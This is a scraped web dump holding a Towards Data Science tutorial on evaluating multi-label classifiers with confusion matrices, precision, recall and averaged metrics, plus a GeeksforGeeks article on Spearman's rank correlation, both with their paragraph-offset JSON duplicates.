ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 29567, "s": 29558, "text": "Comments" }, { "code": null, "e": 29580, "s": 29567, "text": "Old Comments" }, { "code": null, "e": 29619, "s": 29580, "text": "Build a Survey Form using HTML and CSS" }, { "code": null, "e": 29641, "s": 29619, "text": "CSS | Text Formatting" }, { "code": null, "e": 29697, "s": 29641, "text": "How to align content of a div to the bottom using CSS ?" }, { "code": null, "e": 29731, "s": 29697, "text": "Primer CSS Flexbox Flex Direction" }, { "code": null, "e": 29774, "s": 29731, "text": "Difference between em and rem units in CSS" }, { "code": null, "e": 29824, "s": 29774, "text": "How to Insert Form Data into Database using PHP ?" }, { "code": null, "e": 29866, "s": 29824, "text": "Form validation using HTML and JavaScript" }, { "code": null, "e": 29927, "s": 29866, "text": "How to set input type date in dd-mm-yyyy format using HTML ?" } ]
Evaluating Multi-label Classifiers | by Aniruddha Karajgi | Towards Data Science
Classification is an important application of machine learning. It is a predictive modelling task that entails assigning a class label to a data point, meaning that that particular datapoint belongs to the assigned class. - Accuracy- The Confusion Matrix- A multi-label classification example- Multilabel classification confusion matrix- Aggregate metrics- Some Common Scenarios Developing and applying models is one thing, but without a way to evaluate them, experimentation quickly becomes pointless. Most people know what accuracy is, even if it's just in an intuitive sense — how accurate something is, refers to how often it achieves some goal. That goal could be how often a soccer player’s shots are on target, or how accurate tomorrow’s weather was predicted. When it comes to classification, it's measured by how often a model correctly classifies data. Simply put, for a classification problem, accuracy can be measured as: accuracy = number of correct predictions / total predictions This seems like a good way to evaluate a model — you’d expect a “better” model to be more accurate than some “less good” model. And while that’s generally true, accuracy sometimes fails to give you the entire picture, like imbalanced datasets, for example. Let’s say you have data belonging to two classes: red and blue. Class red has the majority of data points. Let’s say that their proportion is 9:1. That would mean that given 100 data points, 90 would belong to class red, while only 10 would belong to class blue. Now, what if my model is so poorly trained that it always predicts class red, no matter what datapoint it's given? You can probably see where I’m going with this. In the above case, my model’s accuracy would end up being 90%. It would get all reds correct, and all blues wrong. So, accuracy would be 90 / (90 + 10) or 90%. Objectively speaking, this would be a pretty decent classification accuracy to aim for. But accuracy, in this case, hides the fact that our model has, in fact, learned nothing at all and always predicts class red. A confusion matrix is a matrix that breaks down correctly and incorrectly classified into: True positive (TP): Correctly predicting the positive class True Negative (TN): Correctly predicting the negative class False Positive (FP): Incorrectly predicting the positive class False Negative (FN): Incorrectly predicting the negative class Using these, metrics like precision, recall and f1-score are defined, which, compared to accuracy, give us a more accurate (hah!) measure of what’s going on. Coming back to our example, our negative class is class red and the positive class is blue. Let’s say we test our model on 100 data points. Maintaining the same distribution, 90 of the data points would be red, while 10 would be blue. Its confusion matrix would be: True positive = 0True negative = 90False positive = 10False Negative = 0 Computing Precision, recall and F1-score Precision = TP / (TP + FP) = 0 / (0 + 10) = 0Recall = TP / (TP + FN) = 0 / (0 + 0) = NaN So though my model’s accuracy was 90%, a generally good score, its precision is 0 and recall is NaN, showing that the model didn’t predict the positive class even a single time. This is a good example of where accuracy doesn’t give us the entire picture. The same is true for precision and recall individually. Multilabel classification refers to the case where a data point can be assigned to more than one class, and there are many classes available. This is not the same as multi-class classification, which is where each data point can only be assigned to one class, irrespective of the actual number of possible classes. Unlike in multi-class classification, in multilabel classification, the classes aren’t mutually exclusive Evaluating a binary classifier using metrics like precision, recall and f1-score is pretty straightforward, so I won’t be discussing that. Doing the same for multi-label classification isn’t exactly too difficult either— just a little more involved. To make it easier, let’s walk through a simple example, which we’ll tweak as we go along. Let’s say we have data spread across three classes — class A, class B and class C. Our model attempts to classify data points into these classes. This is a multi-label classification problem, so these classes aren’t exclusive. Let’s take 3 data points as our test set to simply things. expected predictedA, C A, BC CA, B, C B, C We’ll first see what a confusion matrix looks like for a multilabel problem and then create a separate one for one of the classes as an example. We’ll encode the classes A, B and C using sklearn’s MultiLabelBinarizer. So every prediction can be expressed as a three-bit string, where the first bit represents A, then B and the last bit is C. expected predicted1 0 1 1 1 00 0 1 0 0 11 1 1 0 1 1 Based on a question from a reader, I want to clarify that transformations like binarizers and scalers are supposed to be fit on your training set only. Of course, you want to apply these same transformations during inference, but they aren’t supposed to be fit to the new data. The above list of expected and predicted labels is just to visually understand how they are different. train, test <- datatransformed_train <- fit + transformtransformed_test <- transform (using the same scaler/binarizer) Let’s find the confusion matrix for class A based on our test. For calculating true positive, we’re looking at the cases where our model predicted the label A and the expected labels also contained A. So TP would be equal to 1. Coming to FP, we are looking for those cases where our model predicted the label A but A isn’t in the true label. So FP is 0. Coming to TN, this is where neither the expected labels nor the predicted labels contain class A. So TN is 1. Finally, FN is where the A is an expected label, but it wasn’t predicted by our model. So FN is 1. Let’s make the confusion matrix for class A using these values: TN FPFN TP We get: A similar computation can be done for the other two classes. Class B: 1 1 0 1Class C: 0 0 1 2 Confusion matrices like the ones we just calculated can be generated using sklearn’s multilabel_confusion_matrix. We simply pass in the expected and predicted labels (after binarizing them)and get the first element from the list of confusion matrices — one for each class. confusion_matrix_A = multilabel_confusion_matrix(y_expected, y_pred)[0] The output is consistent with our calculations. print(confusion_matrix_A)# prints:1 01 1 Using the confusion matrices we just computed, let’s calculate each metric for class A as an example. Precision for class A Precision is simply: Precision = TP / (TP + FP) In the case of class A, that ends up being: 1 / (1 + 0) = 1 Recall for class A Using the formula for recall given as: Recall = TP / (TP + FN) we get: 1 / (1 + 1) = 0.5 F1-score for class A This is just the harmonic mean of the precision and recall we calculated. which gives us: These metrics can be calculated for classes B and C in the same way. On finishing it for all the other classes, we end up with the following results: Class B Precision = 0.5Recall = 1.0F1-score = 0.667 Class C Precision = 1.0Recall = 0.667F1-score = 0.8 Aggregate metrics like macro, micro, weighted and sampled avg give us a high-level view of how our model is performing. Macro average This is simply the average of a metric — precision, recall or f1-score — over all classes. So in our case, the macro-average for precision would be Precision (micro avg)= (Precision of A + Precision of B + Precision of C) / 3= 0.833 Micro average The micro-average of a metric is calculated by considering all the TP, TN, FP and FN for each class, adding them up and then using those to compute the metric’s micro-average For example, micro-precision would be: micro avg (precision) = sum(Tp) / (sum(TP) + sum(FP)) For our example, we end up getting: Weighted average This is simply the average of the metric values for individual classes weighted by the support of that class. Samples average Here, we compute metrics for each sample and then average them. In our example, we have three samples. expected predictedA, C A, BC CA, B, C B, C For sample #1, A and B were predicted, but the expected classes were A and C So the precision for this sample would be 1 / 2, since out of the two predicted labels, only one was correct. For sample #2, C was predicted, and C was expected. So precision would be 1 for this sample — all predicted labels were expected. For sample #3, B and C were predicted, but all three labels were expected. Since all predicted labels were expected, precision would be 1. Note that though A wasn’t predicted, the missing label won’t hurt precision, it’ll hurt recall. Averaging this, we get our samples average for precision. (1/2 + 1 + 1) / 3 = 5/6 = 0.833 These aggregates can be computed for recall and f1-score as well. Putting all this together, we end up with our classification report. Our computed values match those generated by sklearn. We’ll use sklearn’s metrics.classifiction_report function. classification_report( y_expected, y_pred, output_dict=False, target_names=['class A', 'class B', 'class C']) These are some scenarios that are likely to occur when evaluating multi-label classifiers. Real-world test data can have duplicates. If you don’t remove them, how would they affect the performance of your model? The aggregate metrics generally used when evaluating classification models are forms of average. So the effect of duplicates comes down to whether these duplicated data points are correctly classified or not. When your model doesn’t predict every expected label but also doesn’t predict extra labels, you’ll see higher precision values along with lower recall values. Whatever your model predicts, it's doing it correctly (high precision) but it's not always predicting what’s expected (low recall). This is the opposite of the previous scenario. Since your model is predicting extra labels, those extra classes would end up with lower precision (since those predictions aren’t expected). At the same time, your model is predicting all the expected labels too, so you’d end up with high recall scores. This is the ideal scenario, where both precision and recall are high. Intuitively, this means that when our model predicts a particular label, that’s most often an expected label, and when a particular label is expected, our model generally gets it right. This means that our model is really selective in its predictions. When a data point is particularly difficult to label, our model chooses to not take the risk of predicting an incorrect label. This means that when our model predicts a particular label, it is more often than not correct (high precision), but the same isn’t true the other way around (low recall). In this case, our model is pretty lenient in its predictions. It is more likely to assign a label to a data point even if it’s not completely sure. And because of this, our model is likely to assign incorrect labels to certain data points, leading to a drop in precision. Most algorithms use a threshold of 0.5. This means that predictions with confidence greater than 0.5 are considered to belong to the positive class, while less confident predictions aren’t considered. How does this relate to the entire precision-recall discussion? Well, think about what would happen if you modified this threshold. If you increase your threshold, you’re getting more stringent about what your model predicts. Now that only predictions with high confidence are assigned, your model is more likely to be right when it predicts a class, leading to high precision. At the same time, your model may miss expected labels that had low confidence, leading to a lower recall. On the other hand, reducing your model’s classification threshold would mean that your model is lenient about its predictions. That would mean that your model is more likely to predict expected labels though they may have been low-confidence decisions, meaning that you’ll have a high recall. But now that your model is less strict, it’s likely that the labels it assigns aren’t part of the expected labels, leading to lower precision. As we just saw, there’s a tradeoff between precision and recall. If you make your model highly selective, you end up with better precision, but risk facing a drop in recall, and vice versa. Between these two metrics, what’s more important depends on the problem you’re trying to solve. Medical diagnostic tools, like skin cancer detection systems, can’t afford to label a cancerous case as a non-cancerous one. Here, you would want to minimize the false negatives. This means that you’re trying to maximize recall. Likewise, if you consider a recommendation system, you’re more concerned with recommending something that customers may not be interested in than with not recommending something they would be interested in. Here, fall negatives aren’t an issue — the goal is to make the content as relevant as possible. Since we’re reducing false positives here, we’re focusing on precision, rather than recall. A good way to remember the difference between what precision and recall represent is explained in this answer by Jennifer on the data science StackExchange site: datascience.stackexchange.com Definitely. Different kinds of problems have different metrics that work best for that particular case. Even for the case we just discussed — multi-label classification — there’s another metric called a Hamming Score, which evaluates how close your model’s predictions are to what’s expected. You can think of it as a more forgiving kind of accuracy for multilabel classifiers. A good starting point would be this excellent TowardsDataScience article by Rahul Agarwal. towardsdatascience.com All code used in this article is available here: github.com Evaluating your model using the right metrics is imperative. Realizing halfway through your experiments that you were measuring the wrong thing is not a fun position to be in. You can avoid this by finding out which metrics are the most relevant to your use case, and then actually understanding how these are computed and what they mean. Hopefully, this article gave you an idea of how multi-label classifiers are evaluated. Thanks for reading! 22/21/12 fixed issue in recall formula 2/11/21 wording improvements add example code 15/4/22 note on transforming data
[ { "code": null, "e": 393, "s": 171, "text": "Classification is an important application of machine learning. It is a predictive modelling task that entails assigning a class label to a data point, meaning that that particular datapoint belongs to the assigned class." }, { "code": null, "e": 550, "s": 393, "text": "- Accuracy- The Confusion Matrix- A multi-label classification example- Multilabel classification confusion matrix- Aggregate metrics- Some Common Scenarios" }, { "code": null, "e": 674, "s": 550, "text": "Developing and applying models is one thing, but without a way to evaluate them, experimentation quickly becomes pointless." }, { "code": null, "e": 939, "s": 674, "text": "Most people know what accuracy is, even if it's just in an intuitive sense — how accurate something is, refers to how often it achieves some goal. That goal could be how often a soccer player’s shots are on target, or how accurate tomorrow’s weather was predicted." }, { "code": null, "e": 1034, "s": 939, "text": "When it comes to classification, it's measured by how often a model correctly classifies data." }, { "code": null, "e": 1105, "s": 1034, "text": "Simply put, for a classification problem, accuracy can be measured as:" }, { "code": null, "e": 1166, "s": 1105, "text": "accuracy = number of correct predictions / total predictions" }, { "code": null, "e": 1423, "s": 1166, "text": "This seems like a good way to evaluate a model — you’d expect a “better” model to be more accurate than some “less good” model. And while that’s generally true, accuracy sometimes fails to give you the entire picture, like imbalanced datasets, for example." }, { "code": null, "e": 1570, "s": 1423, "text": "Let’s say you have data belonging to two classes: red and blue. Class red has the majority of data points. Let’s say that their proportion is 9:1." }, { "code": null, "e": 1686, "s": 1570, "text": "That would mean that given 100 data points, 90 would belong to class red, while only 10 would belong to class blue." }, { "code": null, "e": 1801, "s": 1686, "text": "Now, what if my model is so poorly trained that it always predicts class red, no matter what datapoint it's given?" }, { "code": null, "e": 1849, "s": 1801, "text": "You can probably see where I’m going with this." }, { "code": null, "e": 2009, "s": 1849, "text": "In the above case, my model’s accuracy would end up being 90%. It would get all reds correct, and all blues wrong. So, accuracy would be 90 / (90 + 10) or 90%." }, { "code": null, "e": 2223, "s": 2009, "text": "Objectively speaking, this would be a pretty decent classification accuracy to aim for. But accuracy, in this case, hides the fact that our model has, in fact, learned nothing at all and always predicts class red." }, { "code": null, "e": 2314, "s": 2223, "text": "A confusion matrix is a matrix that breaks down correctly and incorrectly classified into:" }, { "code": null, "e": 2374, "s": 2314, "text": "True positive (TP): Correctly predicting the positive class" }, { "code": null, "e": 2434, "s": 2374, "text": "True Negative (TN): Correctly predicting the negative class" }, { "code": null, "e": 2497, "s": 2434, "text": "False Positive (FP): Incorrectly predicting the positive class" }, { "code": null, "e": 2560, "s": 2497, "text": "False Negative (FN): Incorrectly predicting the negative class" }, { "code": null, "e": 2718, "s": 2560, "text": "Using these, metrics like precision, recall and f1-score are defined, which, compared to accuracy, give us a more accurate (hah!) measure of what’s going on." }, { "code": null, "e": 2953, "s": 2718, "text": "Coming back to our example, our negative class is class red and the positive class is blue. Let’s say we test our model on 100 data points. Maintaining the same distribution, 90 of the data points would be red, while 10 would be blue." }, { "code": null, "e": 2984, "s": 2953, "text": "Its confusion matrix would be:" }, { "code": null, "e": 3063, "s": 2984, "text": "True positive = 0True negative = 90False positive = 10False Negative = 0" }, { "code": null, "e": 3104, "s": 3063, "text": "Computing Precision, recall and F1-score" }, { "code": null, "e": 3232, "s": 3104, "text": "Precision = TP / (TP + FP) = 0 / (0 + 10) = 0Recall = TP / (TP + FN) = 0 / (0 + 0) = NaN" }, { "code": null, "e": 3410, "s": 3232, "text": "So though my model’s accuracy was 90%, a generally good score, its precision is 0 and recall is NaN, showing that the model didn’t predict the positive class even a single time." }, { "code": null, "e": 3543, "s": 3410, "text": "This is a good example of where accuracy doesn’t give us the entire picture. The same is true for precision and recall individually." }, { "code": null, "e": 3685, "s": 3543, "text": "Multilabel classification refers to the case where a data point can be assigned to more than one class, and there are many classes available." }, { "code": null, "e": 3858, "s": 3685, "text": "This is not the same as multi-class classification, which is where each data point can only be assigned to one class, irrespective of the actual number of possible classes." }, { "code": null, "e": 3964, "s": 3858, "text": "Unlike in multi-class classification, in multilabel classification, the classes aren’t mutually exclusive" }, { "code": null, "e": 4214, "s": 3964, "text": "Evaluating a binary classifier using metrics like precision, recall and f1-score is pretty straightforward, so I won’t be discussing that. Doing the same for multi-label classification isn’t exactly too difficult either— just a little more involved." }, { "code": null, "e": 4304, "s": 4214, "text": "To make it easier, let’s walk through a simple example, which we’ll tweak as we go along." }, { "code": null, "e": 4531, "s": 4304, "text": "Let’s say we have data spread across three classes — class A, class B and class C. Our model attempts to classify data points into these classes. This is a multi-label classification problem, so these classes aren’t exclusive." }, { "code": null, "e": 4590, "s": 4531, "text": "Let’s take 3 data points as our test set to simply things." }, { "code": null, "e": 4656, "s": 4590, "text": "expected predictedA, C A, BC CA, B, C B, C" }, { "code": null, "e": 4801, "s": 4656, "text": "We’ll first see what a confusion matrix looks like for a multilabel problem and then create a separate one for one of the classes as an example." }, { "code": null, "e": 4998, "s": 4801, "text": "We’ll encode the classes A, B and C using sklearn’s MultiLabelBinarizer. So every prediction can be expressed as a three-bit string, where the first bit represents A, then B and the last bit is C." }, { "code": null, "e": 5071, "s": 4998, "text": "expected predicted1 0 1 1 1 00 0 1 0 0 11 1 1 0 1 1" }, { "code": null, "e": 5349, "s": 5071, "text": "Based on a question from a reader, I want to clarify that transformations like binarizers and scalers are supposed to be fit on your training set only. Of course, you want to apply these same transformations during inference, but they aren’t supposed to be fit to the new data." }, { "code": null, "e": 5452, "s": 5349, "text": "The above list of expected and predicted labels is just to visually understand how they are different." }, { "code": null, "e": 5571, "s": 5452, "text": "train, test <- datatransformed_train <- fit + transformtransformed_test <- transform (using the same scaler/binarizer)" }, { "code": null, "e": 5634, "s": 5571, "text": "Let’s find the confusion matrix for class A based on our test." }, { "code": null, "e": 5772, "s": 5634, "text": "For calculating true positive, we’re looking at the cases where our model predicted the label A and the expected labels also contained A." }, { "code": null, "e": 5799, "s": 5772, "text": "So TP would be equal to 1." }, { "code": null, "e": 5913, "s": 5799, "text": "Coming to FP, we are looking for those cases where our model predicted the label A but A isn’t in the true label." }, { "code": null, "e": 5925, "s": 5913, "text": "So FP is 0." }, { "code": null, "e": 6023, "s": 5925, "text": "Coming to TN, this is where neither the expected labels nor the predicted labels contain class A." }, { "code": null, "e": 6035, "s": 6023, "text": "So TN is 1." }, { "code": null, "e": 6122, "s": 6035, "text": "Finally, FN is where the A is an expected label, but it wasn’t predicted by our model." }, { "code": null, "e": 6134, "s": 6122, "text": "So FN is 1." }, { "code": null, "e": 6198, "s": 6134, "text": "Let’s make the confusion matrix for class A using these values:" }, { "code": null, "e": 6213, "s": 6198, "text": "TN FPFN TP" }, { "code": null, "e": 6221, "s": 6213, "text": "We get:" }, { "code": null, "e": 6282, "s": 6221, "text": "A similar computation can be done for the other two classes." }, { "code": null, "e": 6340, "s": 6282, "text": "Class B: 1 1 0 1Class C: 0 0 1 2" }, { "code": null, "e": 6613, "s": 6340, "text": "Confusion matrices like the ones we just calculated can be generated using sklearn’s multilabel_confusion_matrix. We simply pass in the expected and predicted labels (after binarizing them)and get the first element from the list of confusion matrices — one for each class." }, { "code": null, "e": 6688, "s": 6613, "text": "confusion_matrix_A = multilabel_confusion_matrix(y_expected, y_pred)[0]" }, { "code": null, "e": 6736, "s": 6688, "text": "The output is consistent with our calculations." }, { "code": null, "e": 6779, "s": 6736, "text": "print(confusion_matrix_A)# prints:1 01 1" }, { "code": null, "e": 6881, "s": 6779, "text": "Using the confusion matrices we just computed, let’s calculate each metric for class A as an example." }, { "code": null, "e": 6903, "s": 6881, "text": "Precision for class A" }, { "code": null, "e": 6924, "s": 6903, "text": "Precision is simply:" }, { "code": null, "e": 6951, "s": 6924, "text": "Precision = TP / (TP + FP)" }, { "code": null, "e": 6995, "s": 6951, "text": "In the case of class A, that ends up being:" }, { "code": null, "e": 7011, "s": 6995, "text": "1 / (1 + 0) = 1" }, { "code": null, "e": 7030, "s": 7011, "text": "Recall for class A" }, { "code": null, "e": 7069, "s": 7030, "text": "Using the formula for recall given as:" }, { "code": null, "e": 7093, "s": 7069, "text": "Recall = TP / (TP + FN)" }, { "code": null, "e": 7101, "s": 7093, "text": "we get:" }, { "code": null, "e": 7119, "s": 7101, "text": "1 / (1 + 1) = 0.5" }, { "code": null, "e": 7140, "s": 7119, "text": "F1-score for class A" }, { "code": null, "e": 7214, "s": 7140, "text": "This is just the harmonic mean of the precision and recall we calculated." }, { "code": null, "e": 7230, "s": 7214, "text": "which gives us:" }, { "code": null, "e": 7299, "s": 7230, "text": "These metrics can be calculated for classes B and C in the same way." }, { "code": null, "e": 7380, "s": 7299, "text": "On finishing it for all the other classes, we end up with the following results:" }, { "code": null, "e": 7388, "s": 7380, "text": "Class B" }, { "code": null, "e": 7432, "s": 7388, "text": "Precision = 0.5Recall = 1.0F1-score = 0.667" }, { "code": null, "e": 7440, "s": 7432, "text": "Class C" }, { "code": null, "e": 7484, "s": 7440, "text": "Precision = 1.0Recall = 0.667F1-score = 0.8" }, { "code": null, "e": 7604, "s": 7484, "text": "Aggregate metrics like macro, micro, weighted and sampled avg give us a high-level view of how our model is performing." }, { "code": null, "e": 7618, "s": 7604, "text": "Macro average" }, { "code": null, "e": 7709, "s": 7618, "text": "This is simply the average of a metric — precision, recall or f1-score — over all classes." }, { "code": null, "e": 7766, "s": 7709, "text": "So in our case, the macro-average for precision would be" }, { "code": null, "e": 7851, "s": 7766, "text": "Precision (micro avg)= (Precision of A + Precision of B + Precision of C) / 3= 0.833" }, { "code": null, "e": 7865, "s": 7851, "text": "Micro average" }, { "code": null, "e": 8040, "s": 7865, "text": "The micro-average of a metric is calculated by considering all the TP, TN, FP and FN for each class, adding them up and then using those to compute the metric’s micro-average" }, { "code": null, "e": 8079, "s": 8040, "text": "For example, micro-precision would be:" }, { "code": null, "e": 8133, "s": 8079, "text": "micro avg (precision) = sum(Tp) / (sum(TP) + sum(FP))" }, { "code": null, "e": 8169, "s": 8133, "text": "For our example, we end up getting:" }, { "code": null, "e": 8186, "s": 8169, "text": "Weighted average" }, { "code": null, "e": 8296, "s": 8186, "text": "This is simply the average of the metric values for individual classes weighted by the support of that class." }, { "code": null, "e": 8312, "s": 8296, "text": "Samples average" }, { "code": null, "e": 8415, "s": 8312, "text": "Here, we compute metrics for each sample and then average them. In our example, we have three samples." }, { "code": null, "e": 8481, "s": 8415, "text": "expected predictedA, C A, BC CA, B, C B, C" }, { "code": null, "e": 8558, "s": 8481, "text": "For sample #1, A and B were predicted, but the expected classes were A and C" }, { "code": null, "e": 8668, "s": 8558, "text": "So the precision for this sample would be 1 / 2, since out of the two predicted labels, only one was correct." }, { "code": null, "e": 8720, "s": 8668, "text": "For sample #2, C was predicted, and C was expected." }, { "code": null, "e": 8798, "s": 8720, "text": "So precision would be 1 for this sample — all predicted labels were expected." }, { "code": null, "e": 8873, "s": 8798, "text": "For sample #3, B and C were predicted, but all three labels were expected." }, { "code": null, "e": 9033, "s": 8873, "text": "Since all predicted labels were expected, precision would be 1. Note that though A wasn’t predicted, the missing label won’t hurt precision, it’ll hurt recall." }, { "code": null, "e": 9091, "s": 9033, "text": "Averaging this, we get our samples average for precision." }, { "code": null, "e": 9123, "s": 9091, "text": "(1/2 + 1 + 1) / 3 = 5/6 = 0.833" }, { "code": null, "e": 9189, "s": 9123, "text": "These aggregates can be computed for recall and f1-score as well." }, { "code": null, "e": 9371, "s": 9189, "text": "Putting all this together, we end up with our classification report. Our computed values match those generated by sklearn. We’ll use sklearn’s metrics.classifiction_report function." }, { "code": null, "e": 9493, "s": 9371, "text": "classification_report( y_expected, y_pred, output_dict=False, target_names=['class A', 'class B', 'class C'])" }, { "code": null, "e": 9584, "s": 9493, "text": "These are some scenarios that are likely to occur when evaluating multi-label classifiers." }, { "code": null, "e": 9914, "s": 9584, "text": "Real-world test data can have duplicates. If you don’t remove them, how would they affect the performance of your model? The aggregate metrics generally used when evaluating classification models are forms of average. So the effect of duplicates comes down to whether these duplicated data points are correctly classified or not." }, { "code": null, "e": 10073, "s": 9914, "text": "When your model doesn’t predict every expected label but also doesn’t predict extra labels, you’ll see higher precision values along with lower recall values." }, { "code": null, "e": 10205, "s": 10073, "text": "Whatever your model predicts, it's doing it correctly (high precision) but it's not always predicting what’s expected (low recall)." }, { "code": null, "e": 10507, "s": 10205, "text": "This is the opposite of the previous scenario. Since your model is predicting extra labels, those extra classes would end up with lower precision (since those predictions aren’t expected). At the same time, your model is predicting all the expected labels too, so you’d end up with high recall scores." }, { "code": null, "e": 10763, "s": 10507, "text": "This is the ideal scenario, where both precision and recall are high. Intuitively, this means that when our model predicts a particular label, that’s most often an expected label, and when a particular label is expected, our model generally gets it right." }, { "code": null, "e": 11127, "s": 10763, "text": "This means that our model is really selective in its predictions. When a data point is particularly difficult to label, our model chooses to not take the risk of predicting an incorrect label. This means that when our model predicts a particular label, it is more often than not correct (high precision), but the same isn’t true the other way around (low recall)." }, { "code": null, "e": 11399, "s": 11127, "text": "In this case, our model is pretty lenient in its predictions. It is more likely to assign a label to a data point even if it’s not completely sure. And because of this, our model is likely to assign incorrect labels to certain data points, leading to a drop in precision." }, { "code": null, "e": 11600, "s": 11399, "text": "Most algorithms use a threshold of 0.5. This means that predictions with confidence greater than 0.5 are considered to belong to the positive class, while less confident predictions aren’t considered." }, { "code": null, "e": 11732, "s": 11600, "text": "How does this relate to the entire precision-recall discussion? Well, think about what would happen if you modified this threshold." }, { "code": null, "e": 12084, "s": 11732, "text": "If you increase your threshold, you’re getting more stringent about what your model predicts. Now that only predictions with high confidence are assigned, your model is more likely to be right when it predicts a class, leading to high precision. At the same time, your model may miss expected labels that had low confidence, leading to a lower recall." }, { "code": null, "e": 12520, "s": 12084, "text": "On the other hand, reducing your model’s classification threshold would mean that your model is lenient about its predictions. That would mean that your model is more likely to predict expected labels though they may have been low-confidence decisions, meaning that you’ll have a high recall. But now that your model is less strict, it’s likely that the labels it assigns aren’t part of the expected labels, leading to lower precision." }, { "code": null, "e": 12710, "s": 12520, "text": "As we just saw, there’s a tradeoff between precision and recall. If you make your model highly selective, you end up with better precision, but risk facing a drop in recall, and vice versa." }, { "code": null, "e": 12806, "s": 12710, "text": "Between these two metrics, what’s more important depends on the problem you’re trying to solve." }, { "code": null, "e": 13035, "s": 12806, "text": "Medical diagnostic tools, like skin cancer detection systems, can’t afford to label a cancerous case as a non-cancerous one. Here, you would want to minimize the false negatives. This means that you’re trying to maximize recall." }, { "code": null, "e": 13430, "s": 13035, "text": "Likewise, if you consider a recommendation system, you’re more concerned with recommending something that customers may not be interested in than with not recommending something they would be interested in. Here, fall negatives aren’t an issue — the goal is to make the content as relevant as possible. Since we’re reducing false positives here, we’re focusing on precision, rather than recall." }, { "code": null, "e": 13592, "s": 13430, "text": "A good way to remember the difference between what precision and recall represent is explained in this answer by Jennifer on the data science StackExchange site:" }, { "code": null, "e": 13622, "s": 13592, "text": "datascience.stackexchange.com" }, { "code": null, "e": 14000, "s": 13622, "text": "Definitely. Different kinds of problems have different metrics that work best for that particular case. Even for the case we just discussed — multi-label classification — there’s another metric called a Hamming Score, which evaluates how close your model’s predictions are to what’s expected. You can think of it as a more forgiving kind of accuracy for multilabel classifiers." }, { "code": null, "e": 14091, "s": 14000, "text": "A good starting point would be this excellent TowardsDataScience article by Rahul Agarwal." }, { "code": null, "e": 14114, "s": 14091, "text": "towardsdatascience.com" }, { "code": null, "e": 14163, "s": 14114, "text": "All code used in this article is available here:" }, { "code": null, "e": 14174, "s": 14163, "text": "github.com" }, { "code": null, "e": 14350, "s": 14174, "text": "Evaluating your model using the right metrics is imperative. Realizing halfway through your experiments that you were measuring the wrong thing is not a fun position to be in." }, { "code": null, "e": 14513, "s": 14350, "text": "You can avoid this by finding out which metrics are the most relevant to your use case, and then actually understanding how these are computed and what they mean." }, { "code": null, "e": 14620, "s": 14513, "text": "Hopefully, this article gave you an idea of how multi-label classifiers are evaluated. Thanks for reading!" }, { "code": null, "e": 14629, "s": 14620, "text": "22/21/12" }, { "code": null, "e": 14659, "s": 14629, "text": "fixed issue in recall formula" }, { "code": null, "e": 14667, "s": 14659, "text": "2/11/21" }, { "code": null, "e": 14688, "s": 14667, "text": "wording improvements" }, { "code": null, "e": 14705, "s": 14688, "text": "add example code" }, { "code": null, "e": 14713, "s": 14705, "text": "15/4/22" } ]
Spearman's Rank Correlation - GeeksforGeeks
18 Aug, 2020 What is correlation test?The strength of the association between two variables is known as the correlation test. For instance, if we are interested to know whether there is a relationship between the heights of fathers and sons, a correlation coefficient can be calculated to answer this question. For know more about correlation please refer this. Methods for correlation analysis:There are mainly two types of correlation: Parametric Correlation – Pearson correlation(r) : It measures a linear dependence between two variables (x and y) is known as a parametric correlation test because it depends on the distribution of the data. Non-Parametric Correlation – Kendall(tau) and Spearman(rho): They are rank-based correlation coefficients, are known as non-parametric correlation. Spearman Correlation formula: where,rs = Spearman Correlation coefficientdi = the difference in the ranks given to the two variables values for each item of the data,n = total number of observation Example: In the Spearman’s rank correlation what we do is convert the data even if it is real value data to what we call ranks. Let’s consider taking 10 different data points in variable X1 and Y1. And find out their respective ranks. Then find out the square of the difference in the ranks given to the two variables values for each item of the data. Step 1: Finding Rank- Rank X1: So, what we have done is looked at all the individual values of X1 and assigned a rank to it. For example, the lowest value, in this case, is 2 and it is given a rank 1 the next highest value is 3 that is given a rank 2 and so on. So, we are ranked all of these points. Notice that the sixth and the first value both are tied. So, they get the rank of 6.5(the midway the half of it) because there is a tie. Similarly, if there are more than 2 values that are tied we take all these ranks and average them by the number of data points that have equal values, and correspondingly you have to give the rank. Rank Y1: Similarly, you can give rank to Y1 data points in the same manner. Step 2: Calculate d2–Once you have got the rank you compute the difference in the ranks. So, in this case, the difference in the rank for the first data point is 2 and we square it, similarly, we take the difference in the second data point in the ranks between Xi and Yi which is 2 and square it and we get 4. So, like this, we make the difference in the ranks and by squaring it we get the final what we call the d squared values. We sum overall values and then we compute the Spearman coefficient by using this value in the above formula. By putting the value of the overall sum of d2 and n value rho/rs = 1 - ((6 x 20.5) / 990) = 1 - (123 / 990) = 1 - 0.1242 = 0.88 Properties: rs takes a value between -1(negative association) and 1(positive association). rs = 0 means no association. It can be used when association is non linear. It can be applied for ordinal variables. Spearman Correlation for Anscombe’s Data:Anscombe’s data also known as Anscombe’s quartet comprises of four datasets that have nearly identical simple statistical properties, yet appear very different when graphed. Each dataset consists of eleven (x, y) points. They were constructed in 1973 by the statistician Francis Anscombe to demonstrate both the importance of graphing data before analyzing it and the effect of outliers on statistical properties. Those 4 sets of 11 data-points are given here. Please download the csv file here.When we plot those points it looks like this. I am considering 3 sets of 11 data-points here. A brief explanation of the above diagram:So, if we apply Spearman correlation coefficient for each of these data sets we find that it is nearly identical, it does not matter whether you actually apply into a first data set (top left) or second data set (top right) or the third data set (bottom left). So, what it seems to indicate is that if we apply the Spearman correlation and we find the reasonably high correlation coefficient close to one in this first data set(top left) case. The key point is here we can’t conclude immediately that if the Spearman correlation coefficient is going to be high then there is a linear relationship between them, for example in the second data set(top right) this is a non-linear relationship and still gives rise to a reasonably high value. data-science statistical-algorithms Machine Learning Machine Learning Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments ML | Linear Regression Decision Tree Python | Decision tree implementation Search Algorithms in AI Difference between Informed and Uninformed Search in AI Decision Tree Introduction with example Elbow Method for optimal value of k in KMeans Deploy Machine Learning Model using Flask Reinforcement learning ML | Underfitting and Overfitting
